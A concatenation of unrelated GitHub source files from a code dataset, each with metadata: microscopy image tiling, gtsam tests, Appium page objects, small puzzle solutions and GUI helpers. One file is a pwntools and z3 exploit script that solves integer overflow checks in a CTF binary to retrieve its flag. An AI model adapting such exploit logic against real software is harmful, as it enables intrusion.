IMAGE_FILENAME_PADDING\n + \".tif\"\n)\nNOT_NUMBER_RX = re.compile(\"[^0-9]\")\n\n_rx_number_part = rf\"\\d{{{IMAGE_FILENAME_PADDING}}}\"\nTIFFILE_X_BY_Y_RX = re.compile(\n rf\"tile-(?P<x>{_rx_number_part})x(?P<y>{_rx_number_part})\"\n)\n# name of a directory mapped to the name of the stack for the EM data in it\nDIR_BY_DATATYPE = {\"CLEM-grid\": \"EM_lomag\", \"EM-grid\": \"EM_himag\"}\n\n# register the default namespace used in the OME image metadata xml, this is\n# needed for etree to export xmls without the long namespace on every key\nOME_NAMESPACE_URI = \"http://www.openmicroscopy.org/Schemas/OME/2012-06\"\nNAMESPACE = {\"\": OME_NAMESPACE_URI}\nxml.etree.ElementTree.register_namespace(\"\", OME_NAMESPACE_URI)\n\n\nclass CLEM_Mipmapper(Mipmapper):\n def create_mipmaps(self, args): # override\n file_path, section_name, zvalue, datatype_dir = args\n match = TIFFILE_X_BY_Y_RX.fullmatch(file_path.stem)\n x_by_y = int(match.group(\"x\")), int(match.group(\"y\"))\n tiles = []\n logging.debug(f\"reading {file_path}\")\n with tifffile.TiffFile(file_path) as tiff:\n if not tiff.pages:\n raise RuntimeError(f\"found empty tifffile: {file_path}\")\n\n # tiff files are saved in an approximation of the OME-TIFF format,\n # the metadata is saved as an OME-XML in the description of the\n # first tiff IFD\n metadata = tiff.pages[0].description\n root = xml.etree.ElementTree.fromstring(metadata)\n image_elements = root.findall(\"Image\", NAMESPACE)\n image_elements_by_name = {\n element.attrib[\"Name\"]: element for element in image_elements\n }\n instrument = root.find(\"Instrument\", NAMESPACE)\n detector_by_id = {}\n for detector in instrument.findall(\"Detector\", NAMESPACE):\n _, detector_id = detector.attrib[\"ID\"].split(\":\")\n detectorname = detector.attrib[\"Model\"]\n detector_by_id[detector_id] = detectorname\n\n for page in tiff.pages:\n tile = self.create_mipmap_from_page(\n page,\n x_by_y,\n root,\n image_elements_by_name,\n detector_by_id,\n datatype_dir,\n file_path,\n section_name,\n zvalue,\n )\n tiles.append(tile)\n\n return tiles\n\n def create_mipmap_from_page(\n self,\n page,\n x_by_y,\n root,\n image_elements_by_name,\n detector_by_id,\n datatype_dir,\n file_path,\n section_name,\n zvalue,\n ):\n \"\"\"create mipmaps for a single page in the multipage tiffile\n\n page: tifffile.TiffPage to interpret\n x_by_y: x and y count as tuple\n root: metadata from this tifffile\n image_elements_by_name: dictionary of metadata for image elements\n detector_by_id: dictionary of detector names for ids\n datatype_dir: type of capture\n file_path: path of this tifffile\n section_name: name of this stack\n zvalue: z height of this section\n \"\"\"\n tags = page.tags\n channel = tags[\"PageName\"].value\n width, height = tags[\"ImageWidth\"].value, tags[\"ImageLength\"].value\n element = image_elements_by_name[channel]\n new_root = copy.copy(root)\n for other in image_elements_by_name.values():\n if other != element:\n new_root.remove(other)\n\n description = xml.etree.ElementTree.tostring(\n new_root,\n encoding=\"unicode\",\n xml_declaration=False,\n )\n # tifffile.OmeXml.validate(description)\n image = page.asarray()\n pixels = element.find(\"Pixels\", NAMESPACE)\n if channel == \"Secondary electrons\":\n name = DIR_BY_DATATYPE[datatype_dir]\n image = skimage.util.invert(image) # invert the SEM image\n intensity_clip = 1, 99\n elif (\n channel.startswith(\"Filtered colour \")\n and datatype_dir == \"CLEM-grid\"\n ):\n pixel_channel = pixels.find(\"Channel\", NAMESPACE)\n wavelength = pixel_channel.attrib[\"ExcitationWavelength\"]\n name = f\"exc_{wavelength}nm\"\n intensity_clip = 30, 99\n else:\n raise RuntimeError(\n f\"found unexpected channel '{channel}' in tifffile: \"\n f\"{file_path}\"\n )\n\n x_by_y_str = \"x\".join(\n [str(xy).zfill(IMAGE_FILENAME_PADDING) for xy in x_by_y]\n )\n output_dir = self.mipmap_path / name / section_name / x_by_y_str\n output_dir.mkdir(parents=True, exist_ok=self.clobber)\n pyramid = self.make_pyramid(output_dir, image, description)\n percentile = np.percentile(image, intensity_clip)\n\n # find instrument metadata\n # NOTE: in the layout metadata scopeId becomes temca and cameraId\n # becomes camera. getting modelname dynamically doesn't work because\n # the EM-grid doesn't have it!\n # instrument = root.find(\"Instrument\", NAMESPACE)\n # scope = instrument.find(\"Microscope\", NAMESPACE)\n # modelname = scope.attrib[\"Model\"]\n modelname = \"SECOM\"\n # this assumes each objective has an associated detector with that id,\n # the image only includes the objective id\n objective_settings = element.find(\"ObjectiveSettings\", NAMESPACE)\n _, objective_id = objective_settings.attrib[\"ID\"].split(\":\")\n try:\n detectorname = detector_by_id[objective_id]\n except KeyError as exc:\n raise RuntimeError(\n f\"could not find associated detector with objective \"\n f\"{objective_id}\"\n ) from exc\n\n timestr = element.find(\"AcquisitionDate\", NAMESPACE).text\n time = datetime.datetime.fromisoformat(timestr)\n plane = pixels.find(\"Plane\", NAMESPACE)\n\n tforms = []\n transform = element.find(\"Transform\", NAMESPACE)\n if transform is not None:\n # load transform from spec (often a rotation)\n model = renderapi.transform.AffineModel()\n model.M00 = transform.attrib[\"A00\"]\n model.M01 = transform.attrib[\"A01\"]\n model.M10 = transform.attrib[\"A10\"]\n model.M11 = transform.attrib[\"A11\"]\n model.B0 = transform.attrib[\"A02\"]\n model.B1 = transform.attrib[\"A12\"]\n model.load_M()\n tforms.append(model)\n\n XY = \"X\", \"Y\"\n # size per pixel in micrometers\n size = [float(pixels.attrib[\"PhysicalSize\" + xy]) for xy in XY]\n # scaling on y axis needed to align with an x scaled to 1\n x_size, y_size = size\n y_corrected = float(y_size / x_size)\n if y_corrected:\n tforms.append(renderapi.transform.AffineModel(M11=y_corrected))\n\n # invert y\n # tforms.append(renderapi.transform.AffineModel(M11=-1))\n\n # pixel count\n pixels = [int(pixels.attrib[\"Size\" + xy]) for xy in XY]\n # stage position\n # NOTE: even though the OME spec specifies this parameter in um it is\n # erroneously saved in meters\n position = [plane.attrib[\"Position\" + xy] for xy in XY]\n # NOTE: the y position needs to be inverted, the input data has origin\n # in the bottom left corner\n um_position = [ # convert to micrometers\n float(pos) * 1e6 * invert for pos, invert in zip(position, (1, -1))\n ]\n\n # calculate boundary box\n bbox = np.array([[0, 0], [0, pixels[1]], [pixels[0], 0], [*pixels]])\n for tform in tforms:\n bbox = tform.tform(bbox)\n\n mins = [min(*values) for values in zip(*bbox)]\n maxs = [max(*values) for values in zip(*bbox)]\n axes = [Axis(*item, x_size) for item in zip(mins, maxs, um_position)]\n\n # take the x pixel size only, transform is applied for scale difference\n layout = renderapi.tilespec.Layout(\n sectionId=f\"{section_name}\",\n scopeId=modelname,\n cameraId=detectorname,\n pixelsize=float(x_size),\n )\n layout.stageX, layout.stageY = [float(value) for value in um_position]\n layout.imageCol, layout.imageRow = x_by_y\n spec = renderapi.tilespec.TileSpec(\n imagePyramid=pyramid,\n layout=layout,\n width=width,\n height=height,\n tforms=tforms,\n )\n return Tile(name, zvalue, spec, time, axes, *percentile)\n\n def find_files(self): # override\n section_paths = [*sorted(self.project_path.glob(SECTION_DIR_GLOB))]\n if not section_paths:\n raise RuntimeError(f\"no files found at {self.project_path}\")\n\n logging.info(\n f\"reading {len(section_paths)} section\"\n f\"{'s' if len(section_paths) else ''} from {self.project_path} \"\n f\"using {self.parallel} threads\"\n )\n first_z = None\n for section_path in section_paths:\n try:\n zvalue = int(NOT_NUMBER_RX.sub(\"\", section_path.stem))\n except ValueError as exc:\n raise RuntimeError(\n f\"could not get z value from path {section_path}\"\n ) from exc\n\n if first_z is None:\n first_z = zvalue\n zvalue = 0\n else:\n zvalue -= first_z\n\n section_name = section_path.name\n for datatype_dir in DIR_BY_DATATYPE.keys():\n files = [*section_path.glob(datatype_dir + TIFFILE_GLOB)]\n for file_path in files:\n yield file_path, section_name, zvalue, datatype_dir\n","repo_name":"hoogenboom-group/scripted-render-pipeline","sub_path":"scripted_render_pipeline/importer/clem_mipmapper.py","file_name":"clem_mipmapper.py","file_ext":"py","file_size_in_byte":10363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11635512468","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n\nsetuptools.setup(\n name='jfwEncoderDecoder', \n version='0.2.6',\n author=\"Altamash Abdul Rahim\",\n author_email=\"altamash.ar96@gmail.com\",\n description=\"Binary encoding/decoding package\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/heezes/jfw-encoding-decoding\",\n packages=setuptools.find_packages(),\n install_requires=[\"cstruct\", \"pyclibrary\"],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Operating System :: OS Independent\",\n ],\n )","repo_name":"heezes/jfw-encoding-decoding","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"99213502","text":"import math\nimport textwrap\nimport unittest\n\nfrom gtsam.utils.test_case import GtsamTestCase\n\nimport gtsam\nfrom gtsam import (DiscreteBayesNet, DiscreteConditional, DiscreteDistribution,\n DiscreteFactorGraph, DiscreteKeys, DiscreteValues, Ordering)\n\n# Some keys:\nAsia = (0, 2)\nSmoking = (4, 2)\nTuberculosis = (3, 2)\nLungCancer = (6, 2)\n\nBronchitis = (7, 2)\nEither = (5, 2)\nXRay = (2, 2)\nDyspnea = (1, 2)\n\n\nclass TestDiscreteBayesNet(GtsamTestCase):\n \"\"\"Tests for Discrete Bayes Nets.\"\"\"\n\n def test_constructor(self):\n \"\"\"Test constructing a Bayes net.\"\"\"\n\n bayesNet = DiscreteBayesNet()\n Parent, Child = (0, 2), (1, 2)\n empty = DiscreteKeys()\n prior = DiscreteConditional(Parent, empty, \"6/4\")\n bayesNet.add(prior)\n\n parents = DiscreteKeys()\n parents.push_back(Parent)\n conditional = DiscreteConditional(Child, parents, \"7/3 8/2\")\n bayesNet.add(conditional)\n\n # Check conversion to factor graph:\n fg = DiscreteFactorGraph(bayesNet)\n self.assertEqual(fg.size(), 2)\n self.assertEqual(fg.at(1).size(), 2)\n\n def test_Asia(self):\n \"\"\"Test full Asia example.\"\"\"\n\n asia = DiscreteBayesNet()\n asia.add(Asia, \"99/1\")\n asia.add(Smoking, \"50/50\")\n\n asia.add(Tuberculosis, [Asia], \"99/1 95/5\")\n asia.add(LungCancer, [Smoking], \"99/1 90/10\")\n asia.add(Bronchitis, [Smoking], \"70/30 40/60\")\n\n asia.add(Either, [Tuberculosis, LungCancer], \"F T T T\")\n\n asia.add(XRay, [Either], \"95/5 2/98\")\n asia.add(Dyspnea, [Either, Bronchitis], \"9/1 2/8 3/7 1/9\")\n\n # Convert to factor graph\n fg = DiscreteFactorGraph(asia)\n\n # Create solver and eliminate\n ordering = Ordering()\n for j in range(8):\n ordering.push_back(j)\n chordal = fg.eliminateSequential(ordering)\n expected2 = DiscreteDistribution(Bronchitis, \"11/9\")\n self.gtsamAssertEquals(chordal.at(7), expected2)\n\n # solve\n actualMPE = fg.optimize()\n expectedMPE = DiscreteValues()\n for key in [Asia, Dyspnea, XRay, Tuberculosis, Smoking, Either, LungCancer, Bronchitis]:\n expectedMPE[key[0]] = 0\n self.assertEqual(list(actualMPE.items()),\n list(expectedMPE.items()))\n\n # Check value for MPE is the same\n self.assertAlmostEqual(asia(actualMPE), fg(actualMPE))\n\n # add evidence, we were in Asia and we have dyspnea\n fg.add(Asia, \"0 1\")\n fg.add(Dyspnea, \"0 1\")\n\n # solve again, now with evidence\n actualMPE2 = fg.optimize()\n expectedMPE2 = DiscreteValues()\n for key in [XRay, Tuberculosis, Either, LungCancer]:\n expectedMPE2[key[0]] = 0\n for key in [Asia, Dyspnea, Smoking, Bronchitis]:\n expectedMPE2[key[0]] = 1\n self.assertEqual(list(actualMPE2.items()),\n list(expectedMPE2.items()))\n\n # now sample from it\n chordal2 = fg.eliminateSequential(ordering)\n actualSample = chordal2.sample()\n # TODO(kartikarcot): Resolve the len function issue. Probably\n # due to a use of initializer list which is not supported in CPP17\n # self.assertEqual(len(actualSample), 8)\n\n def test_fragment(self):\n \"\"\"Test evaluate/sampling/optimizing for Asia fragment.\"\"\"\n\n # Create a reverse-topologically sorted fragment:\n fragment = DiscreteBayesNet()\n fragment.add(Either, [Tuberculosis, LungCancer], \"F T T T\")\n fragment.add(Tuberculosis, [Asia], \"99/1 95/5\")\n fragment.add(LungCancer, [Smoking], \"99/1 90/10\")\n\n # Create assignment with missing values:\n given = DiscreteValues()\n for key in [Asia, Smoking]:\n given[key[0]] = 0\n\n # Now sample from fragment:\n values = fragment.sample(given)\n # TODO(kartikarcot): Resolve the len function issue. Probably\n # due to a use of initializer list which is not supported in CPP17\n # self.assertEqual(len(values), 5)\n\n for i in [0, 1, 2]:\n self.assertAlmostEqual(fragment.at(i).logProbability(values),\n math.log(fragment.at(i).evaluate(values)))\n self.assertAlmostEqual(fragment.logProbability(values),\n math.log(fragment.evaluate(values)))\n actual = fragment.sample(given)\n # TODO(kartikarcot): Resolve the len function issue. Probably\n # due to a use of initializer list which is not supported in CPP17\n # self.assertEqual(len(actual), 5)\n\n def test_dot(self):\n \"\"\"Check that dot works with position hints.\"\"\"\n fragment = DiscreteBayesNet()\n fragment.add(Either, [Tuberculosis, LungCancer], \"F T T T\")\n MyAsia = gtsam.symbol('a', 0), 2 # use a symbol!\n fragment.add(Tuberculosis, [MyAsia], \"99/1 95/5\")\n fragment.add(LungCancer, [Smoking], \"99/1 90/10\")\n\n # Make sure we can *update* position hints\n writer = gtsam.DotWriter()\n ph: dict = writer.positionHints\n ph['a'] = 2 # hint at symbol position\n writer.positionHints = ph\n\n # Check the output of dot\n actual = fragment.dot(writer=writer)\n expected_result = \"\"\"\\\n digraph {\n size=\"5,5\";\n\n var3[label=\"3\"];\n var4[label=\"4\"];\n var5[label=\"5\"];\n var6[label=\"6\"];\n var6989586621679009792[label=\"a0\", pos=\"0,2!\"];\n\n var4->var6\n var6989586621679009792->var3\n var3->var5\n var6->var5\n }\"\"\"\n self.assertEqual(actual, textwrap.dedent(expected_result))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"borglab/gtsam","sub_path":"python/gtsam/tests/test_DiscreteBayesNet.py","file_name":"test_DiscreteBayesNet.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","stars":2201,"dataset":"github-code","pt":"40"} +{"seq_id":"12097283245","text":"from appium.webdriver.common.touch_action import TouchAction\n\n\nclass HomePage(object):\n MAIN_PROJECT_SCREEN = 'android:id/content'\n ITEMS = 'com.todoist:id/text'\n COMPLETE_TASK = 'com.todoist:id/menu_item_complete'\n CREATE_TASK = 'com.todoist:id/fab'\n TASK_INPUT_FIELD = 'android:id/message'\n CHANGE_VIEW_BUTTON = 'Change the current view'\n EXPAND_PROJECT_LIST = '//android.widget.ImageView[@content-desc=\"Expand/collapse\"][1]'\n CREATE_PROJECT = '//android.widget.ImageButton[@content-desc=\"Add\"])[1]'\n PROJECT_LIST = '//android.widget.RelativeLayout[@resource-id=\"android:id/content\"]' \\\n '/android.widget.TextView[@resource-id=\"com.todoist:id/name\"]'\n PROJECT_NAME_INPUT = 'com.todoist:id/name'\n\n def __init__(self, driver):\n self.driver = driver\n driver.implicitly_wait(5)\n\n def create_task(self, content):\n self.driver.find_element_by_id(self.CREATE_TASK).click()\n self.driver.find_element_by_id(self.TASK_INPUT_FIELD).send_keys(content)\n self.driver.press_keycode(66) # Enter\n self.driver.press_keycode(111) # Escape - to close the keyboard popup\n\n def complete_task(self, name):\n assert name in self.list_tasks()\n for task in self.driver.find_elements_by_id(self.ITEMS):\n if task.text == name:\n task.click()\n self.driver.find_element_by_id(self.COMPLETE_TASK).click()\n\n def click_task(self, name):\n assert name in self.list_tasks()\n for task in self.driver.find_elements_by_id(self.ITEMS):\n if task.text == name:\n task.click()\n\n def open_sidebar(self):\n self.driver.find_element_by_accessibility_id(self.CHANGE_VIEW_BUTTON).click()\n\n def expand_project_list(self):\n self.driver.find_element_by_xpath(self.EXPAND_PROJECT_LIST).click()\n\n def click_create_project(self):\n self.driver.find_element_by_xpath(self.CREATE_PROJECT).click()\n\n def type_new_project_name(self, name):\n self.driver.find_element_by_id(self.PROJECT_NAME_INPUT).send_keys(name)\n self.driver.press_keycode(66)\n\n def switch_project(self, name):\n assert name in self.list_projects(), \\\n \"%s is not in the available projects: %s\" % (name, str(self.list_projects()))\n for project in self.driver.find_elements_by_xpath(self.PROJECT_LIST):\n if project.text == name:\n project.click()\n\n def list_projects(self):\n self.open_sidebar()\n self.expand_project_list()\n projects = []\n for element in self.driver.find_elements_by_xpath(self.PROJECT_LIST):\n projects.append(element.text)\n return projects\n\n def list_tasks(self):\n tasks = []\n for task in self.driver.find_elements_by_id(self.ITEMS):\n tasks.append(task.text)\n return tasks\n\n def refresh(self):\n screen_size = self.driver.get_window_size()\n screen_width = screen_size.get('width')\n screen_height = screen_size.get('height')\n element = self.driver.find_element_by_id(self.MAIN_PROJECT_SCREEN)\n actions = TouchAction(self.driver)\n actions.press(element, int(screen_width / 2), int(screen_height * 0.2))\\\n .wait(500)\\\n .move_to(element, int(screen_width / 2), int(screen_height * 0.8))\\\n .release()\\\n .perform()\n","repo_name":"EugeneAbramchuk/Todoist","sub_path":"mobile/pages/HomePage.py","file_name":"HomePage.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71294450361","text":"from pwn import *\nfrom z3 import *\n\n# --- Info ---\n# CTF: CybexCTF 2020\n# Date: -\n# Challenge: Integer Operations\n# Description: Multiple integer overflow techniques to get the flag\n# --- End Info ---\n\n#context.log_level = 'debug'\ncontext.terminal = [\"tmux\", \"sp\", \"-h\"]\ncontext.endian = 'little'\n\nPATH = './Integer_Operations'\n\nREMOTE = 0\n\nHOST = '127.0.0.1'\nPORT = 1337\n\ndef level_1():\n\n r.recvuntil('?\\n')\n \n data = r.recvuntil('?\\n')\n \n given = int((data.split('to '))[1].split('?')[0])\n \n log.info('x + ' + str(given) + ' < 0')\n \n lvl1 = Solver()\n\n given_n = BitVec('given_n', 32)\n num = BitVec('num', 32)\n sum_x = BitVec('sum_x', 32)\n\n lvl1.add(given_n == given)\n lvl1.add(sum_x == given_n + num)\n lvl1.add(sum_x < 0)\n lvl1.add(num > 0)\n\n lvl1.check()\n\n output = str(lvl1.model())\n\n num_out = (output.split('num = '))[1].split(',')[0]\n \n log.success('Integer overflow level 1: ' + str(num_out))\n \n r.recvuntil('integer (decimal):')\n r.sendline(str(int(num_out)))\n\ndef level_2():\n\n r.recvuntil('?\\n')\n \n data = r.recvuntil('\\n')\n \n given = int((data.split('from '))[1].split('\\n')[0])\n \n log.info('(' + str(given) + ') - x > 0')\n \n lvl2 = Solver()\n\n given_n = BitVec('given_n', 32)\n num = BitVec('num', 32)\n sub_x = BitVec('sub_x', 32)\n\n lvl2.add(given_n == given)\n lvl2.add(sub_x == given_n - num)\n lvl2.add(sub_x > 0)\n lvl2.add(num < 0)\n\n lvl2.check()\n\n output = str(lvl2.model())\n \n num_out = (output.split('num = '))[1].split(',')[0]\n \n log.success('Integer overflow level 2: ' + str(num_out))\n \n r.recvuntil('integer (decimal):')\n r.sendline(str(int(num_out)))\n\ndef level_3():\n \n log.info('x + y = 1337')\n log.info('x > 1337')\n log.info('y > 1337')\n \n lvl3 = Solver()\n\n n = BitVec('n', 32)\n x_n = BitVec('x_n', 32)\n y_n = BitVec('y_n', 32)\n\n lvl3.add(n == 1337)\n lvl3.add(x_n + y_n == n)\n lvl3.add(UGE(x_n, n))\n lvl3.add(UGE(y_n, n))\n\n lvl3.check()\n\n output = str(lvl3.model())\n \n x = (output.split('x_n = '))[1].split(',')[0]\n y = (output.split('y_n = '))[1].split(',')[0]\n \n log.success('Integer overflow level 3 (x): ' + str(x))\n log.success('Integer overflow level 3 (y): ' + str(y))\n \n r.recvuntil('value (decimal):')\n r.sendline(str(int(x)))\n r.recvuntil('value (decimal):')\n r.sendline(str(int(y)))\n\ndef level_4():\n\n log.info('x > 1337')\n log.info('x**2 - 153153 = 417061379')\n \n lvl4 = Solver()\n\n n = BitVec('n', 32)\n x_n = BitVec('x_n', 32)\n n1 = BitVec('n1', 32)\n n2 = BitVec('n2', 32)\n\n lvl4.add(n == 1337)\n lvl4.add(n1 == 153153)\n lvl4.add(n2 == 417061379)\n lvl4.add(UGE(x_n, n))\n lvl4.add(x_n*x_n - n1 == n2)\n\n lvl4.check()\n\n output = str(lvl4.model())\n\n x = (output.split('x_n = '))[1].split(',')[0]\n\n log.success('Integer overflow level 4: ' + str(x))\n \n r.recvuntil('value (decimal):')\n r.sendline(str(int(x)))\n\ndef flag():\n r.recvuntil('your ')\n data = r.recv()\n flag = (data.split('flag:\\n'))[1].split('\\n')[0]\n log.success('Flag: CybexCTF{' + flag + '}')\n \ncontext.binary = PATH\nif REMOTE:\n\tr = remote(HOST, PORT)\nelse:\n\tr = process(PATH)\n\n\nlevel_1()\nlevel_2()\nlevel_3()\nlevel_4()\nflag()\n\nr.close()\n","repo_name":"cqcya/exploit-challenges","sub_path":"Cybexsec_CTF/Integer Operations/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24877360418","text":"import requests\nimport json\n\n# Make an API call, and store the response\nurl = 'https://hacker-news.firebaseio.com/v0/item/19155826.json'\nr = requests.get(url)\nprint(f\"Status code: {r.status_code}\")\n\n# Explorre the structure of the data\nresponse_dict = r.json()\nreadable_file = 'data/readable_hn_data.json'\ntry:\n with open(readable_file, 'w') as f:\n json.dump(response_dict, f, indent = 4)\nexcept FileNotFoundError:\n print(f\"{readable_file} does not exist\")\nelse:\n print(\"Json content written successfully to file\")\n","repo_name":"natcobbinah/Python_prog","sub_path":"python - Eric Mathes/apis/hn_article.py","file_name":"hn_article.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1661248169","text":"\"\"\"\nTools for inspecting existing clusters.\n\"\"\"\n\nimport click\n\nfrom dcos_e2e_cli.common.inspect_cluster import show_cluster_details\nfrom dcos_e2e_cli.common.options import (\n existing_cluster_id_option,\n verbosity_option,\n)\nfrom dcos_e2e_cli.common.utils import check_cluster_id_exists\n\nfrom ._common import ClusterInstances, existing_cluster_ids\nfrom ._options import aws_region_option\n\n\n@click.command('inspect')\n@existing_cluster_id_option\n@aws_region_option\n@verbosity_option\ndef inspect_cluster(cluster_id: str, aws_region: str) -> None:\n \"\"\"\n Show cluster details.\n \"\"\"\n check_cluster_id_exists(\n new_cluster_id=cluster_id,\n existing_cluster_ids=existing_cluster_ids(aws_region=aws_region),\n )\n cluster_instances = ClusterInstances(\n cluster_id=cluster_id,\n aws_region=aws_region,\n )\n show_cluster_details(\n cluster_id=cluster_id,\n cluster_representation=cluster_instances,\n )\n","repo_name":"dcos/dcos-e2e","sub_path":"src/dcos_e2e_cli/dcos_aws/commands/inspect_cluster.py","file_name":"inspect_cluster.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"40"} +{"seq_id":"71844023480","text":"import fileinput\nimport re\nfrom copy import deepcopy\n\ndef run(P, ip, acc):\n words = P[ip]\n if words[0] == 'acc':\n acc += int(words[1])\n ip += 1\n elif words[0] == 'nop':\n ip += 1\n elif words[0] == 'jmp':\n ip += int(words[1])\n return (ip, acc)\n\nP = list([l.split() for l in fileinput.input(files='test.txt')])\n\nip = 0\nacc = 0\nseen = []\nlist_inr = []\ninr = []\nwhile True:\n curr_ip = ip\n if ip in seen:\n print(acc)\n break\n seen.append(ip)\n ip, acc = run(P, ip, acc)\n if ip >= curr_ip:\n inr.append(curr_ip)\n else:\n inr.append(curr_ip)\n list_inr.append(inr)\n inr = []\n\nPmod = deepcopy(P)\n\nif Pmod[list_inr[-2][-1]][0] == 'nop':\n Pmod[list_inr[-2][-1]][0] = 'jmp'\nelif Pmod[list_inr[-2][-1]][0] == 'jmp':\n Pmod[list_inr[-2][-1]][0] = 'nop'\n\nip = 0\nacc = 0\nseen = []\nwhile 0<=ip<len(Pmod):\n seen.append(ip)\n ip, acc = run(Pmod, ip, acc)\nif ip == len(Pmod):\n print(acc)\n","repo_name":"CuongNN218/Advent-of-Code-2020","sub_path":"day8/solver_2_new.py","file_name":"solver_2_new.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4957087125","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nd = np.genfromtxt(\"12_26_23_33/diagnostics.txt\")\n\nplt.subplot(311)\nplt.plot(d[:,1] - np.min(d[:,1]), d[:,3], '.k')\nplt.ylabel(\"Background (e-)\")\n\nplt.subplot(312)\nplt.plot(d[:,1]- np.min(d[:,1]), (d[:,4] - np.median(d[:,4]))/45., '.k')\nplt.ylim(-0.2,0.2)\nplt.ylabel(\"Spectral shift (pix)\")\n\nplt.subplot(313)\nplt.plot(d[:,1]- np.min(d[:,1]), 1.*(d[:,5] - np.mean(d[:,5])), '.k')\nplt.ylim(-0.2,0.2)\nplt.ylabel(\"Spatial shift (pix)\")\n\nplt.xlabel(\"Time (days since first exposure)\")\n\nplt.tight_layout()\nplt.show()\n","repo_name":"lkreidberg/2019_exomoon","sub_path":"figures/fig0_diagnostics.py","file_name":"fig0_diagnostics.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10789980905","text":"# Time: O(n + m)\n# Space: O(n + m)\n\n# kmp solution\nclass Solution(object):\n def removeOccurrences(self, s, part):\n \"\"\"\n :type s: str\n :type part: str\n :rtype: str\n \"\"\"\n def getPrefix(pattern):\n prefix = [-1]*len(pattern)\n j = -1\n for i in xrange(1, len(pattern)):\n while j != -1 and pattern[j+1] != pattern[i]:\n j = prefix[j]\n if pattern[j+1] == pattern[i]:\n j += 1\n prefix[i] = j\n return prefix\n \n prefix = getPrefix(part)\n result, lookup = [], []\n i = -1\n for c in s:\n while i != -1 and part[i+1] != c:\n i = prefix[i]\n if part[i+1] == c:\n i += 1\n result.append(c)\n lookup.append(i)\n if i == len(part)-1:\n result[len(result)-len(part):] = []\n lookup[len(lookup)-len(part):] = []\n i = lookup[-1] if lookup else -1\n return \"\".join(result)\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/remove-all-occurrences-of-a-substring.py","file_name":"remove-all-occurrences-of-a-substring.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"9238561135","text":"from collections.abc import Iterable\n\nfrom PySide2.QtCore import QPoint, QSize, QTimer, Qt\nfrom PySide2.QtGui import QColor, QDoubleValidator, QIcon, QIntValidator\nfrom PySide2.QtWidgets import QApplication, QCheckBox, QFormLayout, QGridLayout, QGroupBox, QHBoxLayout, QLabel, QLayout, QLineEdit, QOpenGLWidget, QPushButton, QScrollArea, QSizePolicy, QSlider, QTextEdit, QVBoxLayout, QWidget\n\nfrom .common import *\n\nfrom .protocol import *\nfrom .ranges import *\n\ndef removeFromLayout(layout, i):\n \"\"\"\n Remove i-th item\n \"\"\"\n count = layout.count()\n i = i if i >= 0 else count + i\n if i >= count or i < 0:\n return False\n item = layout.itemAt(i)\n if item is None:\n return False\n widget = item.widget()\n if widget is None:\n layout.removeItem(item)\n else:\n layout.removeWidget(widget)\n widget.setParent(None)\n return True\n\ndef removeAllWidgetsFromLayout(layout:QLayout, types=None):\n l = [layout.itemAt(i).widget() for i in range(layout.count())]\n \n for w in l:\n if not types or isinstance(w, types):\n w.deleteLater()\n # w.setParent(None) # prefer deleteLater to bypass the bug caused by consecutive signal from editfinsihing (lose focus and press enter at the same time)\n layout.removeWidget(w)\n\ndef tryParse(v, funcs, default=None):\n if not isinstance(funcs, Iterable):\n funcs = [funcs]\n \n for f in funcs:\n try:\n v = f(v)\n except:\n return default\n return v\n\ndef tryParseInt(v, default=None):\n return tryParse(v, int, default)\n \ndef tryParseFloat(v, default=None):\n return tryParse(v, float, default)\n\nclass QCheckBoxWithCB(QCheckBox):\n def __init__(self, initChecked=False, changeCB=None):\n super().__init__()\n self.setChecked(initChecked)\n if changeCB:\n self.stateChanged.connect(changeCB)\n\nclass QNumEdit(QLineEdit):\n def __init__(self, initVal=0, editCB=None, parent=None):\n super().__init__(str(initVal), parent=parent)\n self.editingFinished.connect(lambda: editCB(self.text()))\n \n def setText(self, val):\n super().setText(str(val))\n \n def label(self):\n return \"\"\n \nclass QIntEdit(QNumEdit):\n def __init__(self, initVal=0, minVal=None, maxVal=None, editCB=None, parent=None):\n super().__init__(initVal, editCB=editCB, parent=parent)\n self.setValidator(QIntValidator(int(minVal), int(maxVal)))\n\n @property\n def label(self):\n return f\"Range: ({self.validator().bottom()}, {self.validator().top()})\"\n \nclass QFloatEdit(QNumEdit):\n def __init__(self, initVal=0.0, minVal=None, maxVal=None, decimal=None, editCB=None, parent=None):\n super().__init__(initVal, editCB=editCB, parent=parent)\n self.setValidator(QDoubleValidator(float(minVal), float(maxVal), int(decimal)))\n \n @property\n def label(self):\n return f\"Range: ({self.validator().bottom()}, {self.validator().top()}) [decimals: {self.validator().decimals()}]\"\n 